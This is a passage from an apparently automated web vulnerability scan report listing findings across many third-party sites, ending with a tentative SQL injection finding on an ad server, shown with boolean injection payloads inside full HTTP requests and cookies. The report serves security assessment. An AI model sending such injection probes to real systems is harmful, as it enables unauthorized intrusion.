19.50. http://serverinsiders.com/isp/sophidea-inc.html

19.51. http://siteexplorer.search.yahoo.com/search

19.52. http://techie-buzz.com/

19.53. http://techie-buzz.com/about-us

19.54. http://techie-buzz.com/mobile-news/htc-thunderbolt-gets-root-access-first-custom-rom.html

19.55. http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html

19.56. http://techie-buzz.com/tech-news/google-pagerank-update-this-weekend.html

19.57. http://techie-buzz.com/top-posts

19.58. http://uim.tifbs.net/js/global_485_67.js

19.59. http://vark.com/

19.60. http://vark.com/signup

19.61. http://webcache.googleusercontent.com/search

19.62. http://websiteworth.co/www.xss.cx

19.63. http://whois.domaintools.com/65.49.14.101

19.64. http://wpeve.com/

19.65. http://wpeve.com/favicon.ico

19.66. http://www.alexa.com/siteinfo/xss.cx

19.67. http://www.facebook.com/plugins/like.php

19.68. http://www.facebook.com/plugins/likebox.php

19.69. http://www.facebook.com/plugins/recommendations.php

19.70. http://www.fasthosts.co.uk/

19.71. http://www.gmx.net/

19.72. http://www.google.com/support/chrome/

19.73. http://www.google.com/support/chrome/bin/search.py

19.74. http://www.google.com/support/toolbar/bin/answer.py

19.75. http://www.google.com/support/toolbar/bin/request.py

19.76. http://www.nxivm.com/centers_1024.php

19.77. http://www.nxivm.com/mission_1024.php

19.78. http://www.nxivm.com/vision_1024.php

19.79. http://www.phoenixads.co.in/delivery/ads.asp

19.80. http://www.pixazza.com/widget/99ab10c94b/

19.81. http://www.port80software.com/

19.82. http://www.port80software.com/about/

19.83. http://www.port80software.com/products/cacheright/

19.84. http://www.port80software.com/products/httpzip/

19.85. http://www.port80software.com/products/linkdeny/

19.86. http://www.port80software.com/products/sdai_sdvp_compare.asp

19.87. http://www.port80software.com/products/serverdefender/

19.88. https://www.port80software.com/myport80/

19.89. http://www.projecthoneypot.org/ip_65.49.2.27

19.90. http://www.quova.com/

19.91. http://www.quova.com/

19.92. http://www.quova.com/what/

19.93. http://www.quova.com/what/data-fields/

19.94. http://www.quova.com/what/ip-repository/

19.95. http://www.quova.com/what/products/

19.96. http://www.quova.com/what/services/

19.97. http://www.quova.com/who/

19.98. http://www.robtex.com/ext/ads/buchscr

19.99. http://www.sentrigo.com/

19.100. http://www.sentrigo.com/about-us/company-profile

19.101. http://www.sentrigo.com/cloud-security

19.102. http://www.sentrigo.com/database-security

19.103. http://www.sentrigo.com/solutions/regulatory-database-compliance/ma-201-cmr-17-data-protection

19.104. http://www.sentrigo.com/solutions/regulatory-database-compliance/pci-dss

19.105. https://www.sentrigo.com/contact_us

19.106. http://www.slaviks-blog.com/

19.107. http://www.topwebhosts.org/

19.108. http://www.topwebhosts.org/showcase/reseller-hosting.php

19.109. http://www.topwebhosts.org/tools/ip-locator.php

19.110. http://www.united-domains.de/

19.111. http://www.web.de/

20. File upload functionality

21. TRACE method is enabled

21.1. http://downloads.unitedinternet.de/

21.2. http://mm.chitika.net/

21.3. http://widgets.outbrain.com/

22. Directory listing

22.1. http://order.1and1.com/oneandone_en_common/img/pages/AboutUs/

22.2. http://order.1and1.com/oneandone_en_common/img/pages/Contact/

22.3. http://order.1and1.com/oneandone_en_common/img/pages/Domaininfo/

23. Email addresses disclosed

23.1. http://blog.vark.com/

23.2. http://blog.vark.com/

23.3. https://buy.quova.com/

23.4. https://extranet.quova.com/Portal/quovaExtranet4_1_1.css

23.5. https://extranet.quova.com/Portal/user/Home.view

23.6. http://images.apple.com/global/scripts/lib/event_mixins.js

23.7. http://images.apple.com/global/scripts/lib/scriptaculous.js

23.8. http://order.1and1.com/xml/order/Contact

23.9. http://order.1and1.com/xml/order/Customers

23.10. http://order.1and1.com/xml/order/DomaininfoPdr

23.11. http://order.1and1.com/xml/order/FeatureDomainPdr

23.12. http://order.1and1.com/xml/order/International

23.13. http://order.1and1.com/xml/order/Mail

23.14. http://order.1and1.com/xml/order/MailXchange

23.15. http://order.1and1.com/xml/order/Mission

23.16. http://order.1and1.com/xml/order/PrivacyPolicy

23.17. http://order.1and1.com/xml/order/sitedesign

23.18. https://order.1and1.com/xml/order/costs

23.19. http://saratogaindecline.blogspot.com/2010/03/nxivm-madness.html

23.20. http://saratogaindecline.blogspot.com/2011/02/transparency-and-nxivm.html

23.21. http://seo101.co/js/scripts.js

23.22. https://store.port80software.com/cart/

23.23. https://support.sentrigo.com/

23.24. https://support.sentrigo.com/js/general/common.js

23.25. http://techie-buzz.com/mobile-news/htc-thunderbolt-gets-root-access-first-custom-rom.html

23.26. http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html

23.27. http://techie-buzz.com/tech-news/google-pagerank-update-this-weekend.html

23.28. http://webcache.googleusercontent.com/search

23.29. http://websiteworth.co/ajax/js/lib/prototype.js

23.30. http://websiteworth.co/ajax/js/src/dragdrop.js

23.31. http://widgets.outbrain.com/OutbrainRater.js

23.32. http://www.extravalent.com/

23.33. http://www.fasthosts.co.uk/js/billboard.js

23.34. http://www.fasthosts.co.uk/js/fh.js

23.35. http://www.gmx.net/

23.36. http://www.google.com/accounts/hosted/helpcenter/js/tooltips/TooltipLoader.js

23.37. http://www.google.com/accounts/hosted/helpcenter/js/tooltips/XMLHttpRequest.js

23.38. http://www.google.com/s

23.39. http://www.google.com/search

23.40. http://www.google.com/support/chrome/bin/resource/search_util.js

23.41. http://www.google.com/support/toolbar/bin/resource/search_util.js

23.42. http://www.google.com/uds/api/gdata/2.4/3babe19dfa5d77008524b3d5f6bb06a6/core,opensearch,atom,app,gdata,sidewiki.I.js

23.43. http://www.port80software.com/

23.44. http://www.port80software.com/NaN.asp

23.45. http://www.port80software.com/ServerDefenderVP.asp

23.46. http://www.port80software.com/about/

23.47. http://www.port80software.com/products/cacheright/

23.48. http://www.port80software.com/products/httpzip/

23.49. http://www.port80software.com/products/linkdeny/

23.50. http://www.port80software.com/products/sdai_sdvp_compare.asp

23.51. http://www.port80software.com/products/serverdefender/

23.52. https://www.port80software.com/images/NaN.gif

23.53. https://www.port80software.com/myport80/

23.54. http://www.projecthoneypot.org/ip_65.49.2.27

23.55. http://www.quova.com/what/ip-repository/

23.56. http://www.quova.com/what/products/

23.57. http://www.quova.com/what/services/

23.58. https://www.sentrigo.com/contact_us

23.59. http://www.terabitsystems.com/

23.60. http://www.terabitsystems.com/buy-sell-cisco

23.61. http://www.terabitsystems.com/http://www.terabitsystems.com/favicon.ico

23.62. http://www.townsendassets.com/

23.63. http://www.townsendassets.com/buy-hardware/

23.64. http://www.townsendassets.com/js/menu.js

23.65. http://www.townsendassets.com/sell-hardware/

23.66. http://www.united-domains.de/

23.67. http://www.united-domains.de/include/css/default.css

23.68. http://www.united-domains.de/include/css/evomain.css

23.69. http://www.united-domains.de/include/js/dhtmlxcombo/dhtmlxcombo.js

23.70. http://www.united-domains.de/include/js/dhtmlxcombo/dhtmlxcommon.js

23.71. http://www.united-internet.de/ImprintHeadquarter

24. Private IP addresses disclosed

24.1. http://badge.facebook.com/badge/241276949072.3003.1885138881.png

24.2. http://badge.facebook.com/badge/241276949072.3003.1885138881.png

24.3. http://badge.facebook.com/badge/241276949072.3003.1885138881.png

24.4. http://external.ak.fbcdn.net/safe_image.php

24.5. http://external.ak.fbcdn.net/safe_image.php

24.6. http://external.ak.fbcdn.net/safe_image.php

24.7. http://external.ak.fbcdn.net/safe_image.php

24.8. http://external.ak.fbcdn.net/safe_image.php

24.9. http://external.ak.fbcdn.net/safe_image.php

24.10. http://external.ak.fbcdn.net/safe_image.php

24.11. http://external.ak.fbcdn.net/safe_image.php

24.12. http://external.ak.fbcdn.net/safe_image.php

24.13. http://external.ak.fbcdn.net/safe_image.php

24.14. http://static.ak.fbcdn.net/connect/xd_proxy.php

24.15. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/NeG9mDIZKij.css

24.16. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/WLPy_5W_TZm.css

24.17. http://static.ak.fbcdn.net/rsrc.php/v1/yZ/r/BvBS7QirETx.css

24.18. http://static.ak.fbcdn.net/rsrc.php/v1/yZ/r/HiXhTlK5Vn_.css

24.19. http://techie-buzz.com/

24.20. http://techie-buzz.com/

24.21. http://techie-buzz.com/about-us

24.22. http://techie-buzz.com/mobile-news/htc-thunderbolt-gets-root-access-first-custom-rom.html

24.23. http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html

24.24. http://techie-buzz.com/tech-news/google-pagerank-update-this-weekend.html

24.25. http://techie-buzz.com/top-posts

24.26. http://www.facebook.com/ajax/connect/connect_widget.php

24.27. http://www.facebook.com/campaign/impression.php

24.28. http://www.facebook.com/campaign/impression.php

24.29. http://www.facebook.com/campaign/impression.php

24.30. http://www.facebook.com/campaign/impression.php

24.31. http://www.facebook.com/campaign/impression.php

24.32. http://www.facebook.com/campaign/impression.php

24.33. http://www.facebook.com/campaign/impression.php

24.34. http://www.facebook.com/campaign/impression.php

24.35. http://www.facebook.com/extern/login_status.php

24.36. http://www.facebook.com/extern/login_status.php

24.37. http://www.facebook.com/extern/login_status.php

24.38. http://www.facebook.com/extern/login_status.php

24.39. http://www.facebook.com/plugins/like.php

24.40. http://www.facebook.com/plugins/like.php

24.41. http://www.facebook.com/plugins/like.php

24.42. http://www.facebook.com/plugins/like.php

24.43. http://www.facebook.com/plugins/like.php

24.44. http://www.facebook.com/plugins/like.php

24.45. http://www.facebook.com/plugins/like.php

24.46. http://www.facebook.com/plugins/like.php

24.47. http://www.facebook.com/plugins/like.php

24.48. http://www.facebook.com/plugins/like.php

24.49. http://www.facebook.com/plugins/like.php

24.50. http://www.facebook.com/plugins/like.php

24.51. http://www.facebook.com/plugins/like.php

24.52. http://www.facebook.com/plugins/like.php

24.53. http://www.facebook.com/plugins/like.php

24.54. http://www.facebook.com/plugins/likebox.php

24.55. http://www.facebook.com/plugins/likebox.php

24.56. http://www.facebook.com/plugins/likebox.php

24.57. http://www.facebook.com/plugins/likebox.php

24.58. http://www.facebook.com/plugins/likebox.php

24.59. http://www.facebook.com/plugins/likebox.php

24.60. http://www.facebook.com/plugins/likebox.php

24.61. http://www.facebook.com/plugins/likebox.php

24.62. http://www.facebook.com/plugins/likebox.php

24.63. http://www.facebook.com/plugins/likebox.php

24.64. http://www.facebook.com/plugins/recommendations.php

24.65. http://www.facebook.com/plugins/recommendations.php

24.66. http://www.facebook.com/plugins/recommendations.php

24.67. http://www.facebook.com/plugins/recommendations.php

24.68. http://www.facebook.com/plugins/recommendations.php

24.69. http://www.facebook.com/plugins/recommendations.php

24.70. http://www.facebook.com/plugins/recommendations.php

24.71. http://www.facebook.com/plugins/recommendations.php

25. Robots.txt file

25.1. http://0.gravatar.com/avatar/8981a8d7eaf400c865ad82c8b2861773

25.2. http://1.gravatar.com/avatar/d344937385c993e036c5bfdbd45fae13

25.3. http://a.tribalfusion.com/j.ad

25.4. http://api.nrelate.com/rcw_wp/0.44.1/

25.5. http://api.twitter.com/1/statuses/user_timeline.json

25.6. http://as.casalemedia.com/sd

25.7. http://b.scorecardresearch.com/b

25.8. http://cdn2.techie-buzz.com/kj/c/dc.css

25.9. http://cdn4.techie-buzz.com/wp-includes/js/comment-reply.js

25.10. http://d3.zedo.com/jsc/d3/ff2.html

25.11. http://d7.zedo.com/bar/v16-403/d3/jsc/fm.js

25.12. http://dnstree.com/cx/xss/

25.13. http://gdata.youtube.com/crossdomain.xml

25.14. http://home.compete.com.edgesuite.net/xss.cx_uv_310.png

25.15. http://i.ytimg.com/crossdomain.xml

25.16. http://m1.zedo.com//log/p.gif

25.17. http://mm.chitika.net/minimall

25.18. http://odb.outbrain.com/utils/ping.html

25.19. http://seo101.co/xss.cx

25.20. http://siteexplorer.search.yahoo.com/search

25.21. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.22. http://static.nrelate.com/rcw_wp/0.44.1/nrelate-panels.css

25.23. http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html

25.24. http://us.bc.yahoo.com/b

25.25. http://webcache.googleusercontent.com/search

25.26. http://websiteworth.co/www.xss.cx

25.27. http://wpeve.com/

25.28. http://www.alexa.com/siteinfo/xss.cx

25.29. http://www.googleadservices.com/pagead/conversion/1030456406/

25.30. http://www.linkedin.com/company/api/recommendation/count

25.31. http://www.robtex.com/ext/ads/buchscr

26. Cacheable HTTPS response

26.1. https://buy.quova.com/

26.2. https://buy.quova.com/default.aspx

26.3. https://lists.dns-oarc.net/pipermail/dns-operations/2010-January/004835.html

26.4. https://order.1and1.com/xml/deref

26.5. https://order.1and1.com/xml/order/addon

26.6. https://order.1and1.com/xml/order/costs

26.7. https://order.1and1.com/xml/order/domaincheck

26.8. https://store.port80software.com/cart/

26.9. https://support.sentrigo.com/favicon.ico

26.10. https://www.port80software.com/myport80/

26.11. https://www.sentrigo.com/sites/all/themes/tendu/favicon.ico

27. Multiple content types specified

27.1. http://whois.arin.net/xsl/website.xsl

27.2. http://www.topwebhosts.org/js/common.js

28. HTML does not specify charset

28.1. http://a.tribalfusion.com/p.media/abmOQK1UJ90aynSr3HUrB0WtFUmb7rRUvrYqQt3TZbh4qrYmEMAYbjbUHfVoPfJmGnooWvJ3EMf3tes3A7ZdmFUZcYcrTYGZbV0cfNpTF42bQRTFfZcWAYWQTb2SsQMQdZbxYt7qVP3u2GB3XbBIU6qr5mUeRmfF3tBMXHJJmdAo3938fIhilL/2448066/adTag.html

28.2. http://a.tribalfusion.com/p.media/anmOQKRrevRHf6VGnU4b6onduMXaXM4dfEQs7H2mQIotZatTHQ9XrQ8YUZbjXqqrSbYFUFQSVtv5mrJpRUjtXqrs4qJg4EfRmqjH1rffTtfVoAnBnGYvpWfE5TQ73dem3A7KnF3ZdXsfRYVJ31V7Nmq745FQSWbMZaUPf3QEvQSbQGfIhCJt/2448066/wrapper1.html

28.3. http://ad.doubleclick.net/adi/N2434.burst/B5133480.17

28.4. http://ad.doubleclick.net/adi/N2434.burst/B5133480.19

28.5. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.43

28.6. http://ad.doubleclick.net/adi/N3671.tribe.net/B5229711.2

28.7. http://ad.doubleclick.net/adi/N3671.tribe.net/B5229711.4

28.8. http://ad.doubleclick.net/adi/N3671.tribe.net/B5229711.8

28.9. http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.4

28.10. http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5

28.11. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.21

28.12. http://ad.doubleclick.net/adi/N5621.66.2412875475321/B4682155

28.13. http://ad.yieldmanager.com/iframe3

28.14. http://amch.questionmarket.com/adscgen/sta.php

28.15. http://api.nrelate.com/rcw_wp/0.44.1/

28.16. http://bs.serving-sys.com/BurstingPipe/adServer.bs

28.17. http://cache.techie-buzz.com/ads/120_sidebar_filler.html

28.18. http://cache.techie-buzz.com/ads/160_banner_filler.html

28.19. http://cache.techie-buzz.com/ads/300_1_filler.html

28.20. http://cache.techie-buzz.com/ads/top_468_filler.html

28.21. http://cache.techie-buzz.com/ads/top_728_filler.html

28.22. http://cdn5.tribalfusion.com/media/1956006/frame.html

28.23. http://convoad.technoratimedia.net/007/IBM_CMAD0264/feeds/getFeed_IBM_CMAD0264.php

28.24. http://d3.zedo.com/jsc/d3/ff2.html

28.25. http://developer.quova.com/favicon.ico

28.26. http://dg.specificclick.net/

28.27. http://fls.doubleclick.net/activityi

28.28. http://odb.outbrain.com/utils/ping.html

28.29. http://pagerank.techie-buzz.com/pagerankfetcher.php

28.30. http://seg.sharethis.com/getSegment.php

28.31. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/sz=0X0MN/v=1.1Y/RANDOM_NUMBER/RETURN-CODE/JS/

28.32. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/16763/NF/RETURN-CODE/JS/

28.33. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/2019/NF/RETURN-CODE/JS/

28.34. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/28640/NF/RETURN-CODE/JS/

28.35. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/28649/NF/RETURN-CODE/JS/

28.36. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/3518/NF/RETURN-CODE/JS/

28.37. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/52837/NF/RETURN-CODE/JS/

28.38. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/55742/NF/RETURN-CODE/JS/

28.39. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=300X250A%7C300x600A/44641/RETURN-CODE/JS/

28.40. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=300X250A%7C300x600A/87921/NF/RETURN-CODE/JS/

28.41. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=300X250A%7C300x600A/94532/RETURN-CODE/JS/

28.42. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=728x90A/13568/NI/NF/RETURN-CODE/JS/

28.43. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=728x90A/19238/NI/NF/RETURN-CODE/JS/

28.44. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=728x90A/68204/NI/NF/RETURN-CODE/JS/

28.45. http://www.extravalent.com/

28.46. http://www.nxivm.com/centers_1024.php

28.47. http://www.nxivm.com/mission_1024.php

28.48. http://www.nxivm.com/vision_1024.php

28.49. http://www.phoenixads.co.in/delivery/ads.asp

28.50. http://www.robtex.com/ext/ads/buchban

28.51. http://www.robtex.com/ext/ads/buchscr

28.52. http://www.united-internet.de/united06/cch/teaser.en.html

28.53. http://www.unspam.com/

28.54. http://www.unspam.com/projects.html

28.55. http://www.unspam.com/services.html

29. Content type incorrectly stated

29.1. http://a2.twimg.com/profile_images/136406626/twitt-icon_normal.gif

29.2. http://amch.questionmarket.com/adscgen/sta.php

29.3. http://api.nrelate.com/rcw_wp/0.44.1/

29.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs

29.5. http://cdn2.techie-buzz.com/imagegen/32/32/3:2/http://cache.techie-buzz.com/images/stories/Top5FreeInternetDownloadAccelerators_1276C/freedownloadmanagerlogo.gif

29.6. http://clients1.google.com/complete/search

29.7. http://convoad.technoratimedia.net/007/IBM_CMAD0264/feeds/getFeed_IBM_CMAD0264.php

29.8. http://developer.quova.com/favicon.ico

29.9. http://event.adxpose.com/event.flow

29.10. http://i.ixnp.com/shot_main_js/v6.59/

29.11. http://images.apple.com/global/nav/scripts/globalnav.js

29.12. http://imp.fetchback.com/serve/fb/adtag.js

29.13. http://javadl-esd.sun.com/update/AU/map-2.0.3.1.xml

29.14. http://kona40.kontera.com/KonaGet.js

29.15. http://kona5.kontera.com/KonaGet.js

29.16. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

29.17. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

29.18. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/makeRequest

29.19. http://order.1and1.com/xml/webservice/VDSPriceService

29.20. http://s3.buysellads.com/1239768/32096-1279897532.gif

29.21. http://s3.buysellads.com/1249035/32097-1279897532.gif

29.22. http://s3.buysellads.com/1249105/40019-1287730220.gif

29.23. http://s4.histats.com/stats/1238143.php

29.24. http://s4.histats.com/stats/e.php

29.25. http://shots.snap.com/asj/v1/6e8afd4f63cdc7886a3f718aa78c7375/2863866373/auto_shot.js

29.26. http://shots.snap.com/favicon.ico

29.27. http://shots.snap.com/snap_shots.js

29.28. https://support.sentrigo.com/favicon.ico

29.29. http://tracking.dc-storm.com/xdom/readcook.ashx

29.30. http://whois.arin.net/template/header.xhtml

29.31. http://www.alexa.com/images/ads/ad-toolbar-lady.png

29.32. http://www.appliedtrust.com/sites/default/files/favicon.ico

29.33. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/sz=0X0MN/v=1.1Y/RANDOM_NUMBER/RETURN-CODE/JS/

29.34. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/16763/NF/RETURN-CODE/JS/

29.35. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/2019/NF/RETURN-CODE/JS/

29.36. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/28640/NF/RETURN-CODE/JS/

29.37. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/28649/NF/RETURN-CODE/JS/

29.38. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/3518/NF/RETURN-CODE/JS/

29.39. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/52837/NF/RETURN-CODE/JS/

29.40. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/55742/NF/RETURN-CODE/JS/

29.41. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=300X250A%7C300x600A/44641/RETURN-CODE/JS/

29.42. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=300X250A%7C300x600A/87921/NF/RETURN-CODE/JS/

29.43. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=300X250A%7C300x600A/94532/RETURN-CODE/JS/

29.44. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=728x90A/13568/NI/NF/RETURN-CODE/JS/

29.45. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=728x90A/19238/NI/NF/RETURN-CODE/JS/

29.46. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=728x90A/68204/NI/NF/RETURN-CODE/JS/

29.47. http://www.google.com/mbd

29.48. http://www.google.com/realtimejs

29.49. http://www.google.com/realtimepts

29.50. http://www.google.com/search

29.51. http://www.pixazza.com/widget/99ab10c94b/config/

29.52. http://www.sentrigo.com/sites/all/themes/tendu/favicon.ico

29.53. https://www.sentrigo.com/sites/all/themes/tendu/favicon.ico

29.54. http://www.topwebhosts.org/favicon.ico

29.55. http://www.topwebhosts.org/js/wrest.js

29.56. http://www.united-domains.de/images/evolution/preisliste-flags/pl_gen.gif

30. Content type is not specified

30.1. http://ad.adtegrity.net/st

30.2. http://ad.technoratimedia.com/st

30.3. http://ad.yieldmanager.com/st

30.4. http://eyewond.fcod.llnwd.net/open/1

31. SSL certificate



1. SQL injection  next
There are 7 instances of this issue:


1.1. http://ad.doubleclick.net/adi/N3671.tribe.net/B5229711.4 [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.tribe.net/B5229711.4

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N3671.tribe.net/B5229711.4;sz=300x250;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aNmOvJ2P3eQP7C3HQr0tBJpWEy5mYW3s77TV3cUcbjRAQvUtFUUbF23bIsUajpTEQcQTQFSGYIPUenPHvbVcQQ4FPomteO0aTp3WbFPcZbZa46JZdptToVWbfXUfaYF790qEsSrUGWUQXTHUYmbjsPFryYavn3a3c2qr4maMIUGJRfuxlau/;ord=1246537210?&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 17:25:59 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:25:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Mar 03 15:57:06 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/998766/1013_300x250_Promo_FreePhone_OptimusTv2_Stnd.swf";
var gif = "http://s0.2mdn.net/998766/1013_300x250_Promo_FreePhone_OptimusTv2_Static.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/7/d6/%2a/r%3B236462304%3B0-0%3B0%3B59988977%3B4307-300/250%3B40697905/40715692/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.tribalfusion.com/h.click/aNmOvJ2P3eQP7C3HQr0tBJpWEy5mYW3s77TV3cUcbjRAQvUtFUUbF23bIsUajpTEQcQTQFSGYIPUenPHvbVcQQ4FPomteO0aTp3WbFPcZbZa46JZdptToVWbfXUfaYF790qEsSrUGWUQXTHUYmbjsPFryYavn3a3c2qr4maMIUGJRfuxlau/http://www.t-mobile.com/shop/Phones/cell-phone-detail.aspx?cell-phone=LG-Optimus-T-Black&cm_mmc_o=Kbl5kzYCjC5AygtzlwCjCR5fbFAl%20aCjCdyww%20VtBEwl");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/7/d6/%2a/r%3B236462304%3B0-0%3B0%3B59988977%3B4307-300/250%3B40697905/40715692/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.tribalfusion.com/h.click/aNmOvJ2P3eQP7C3HQr0tBJpWEy5mYW3s77TV3cUcbjRAQvUtFUUbF23bIsUajpTEQcQTQFSGYIPUenPHvbVcQQ4FPomteO0aTp3WbFPcZbZa46JZdptToVWbfXUfaYF790qEsSrUGWUQXTHUYmbjsPFryYavn3a3c2qr4maMIUGJRfuxlau/http://www.t-mobile.com/shop/Phones/cell-phone-detail.aspx?cell-phone=LG-Optimus-T-Black&cm_mmc_o=Kbl5kzYCjC5AygtzlwCjCR5fbFAl%20aCjCdyww%20VtBEwl");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){i
...[SNIP]...

Request 2

GET /adi/N3671.tribe.net/B5229711.4;sz=300x250;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aNmOvJ2P3eQP7C3HQr0tBJpWEy5mYW3s77TV3cUcbjRAQvUtFUUbF23bIsUajpTEQcQTQFSGYIPUenPHvbVcQQ4FPomteO0aTp3WbFPcZbZa46JZdptToVWbfXUfaYF790qEsSrUGWUQXTHUYmbjsPFryYavn3a3c2qr4maMIUGJRfuxlau/;ord=1246537210?&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 17:26:00 GMT
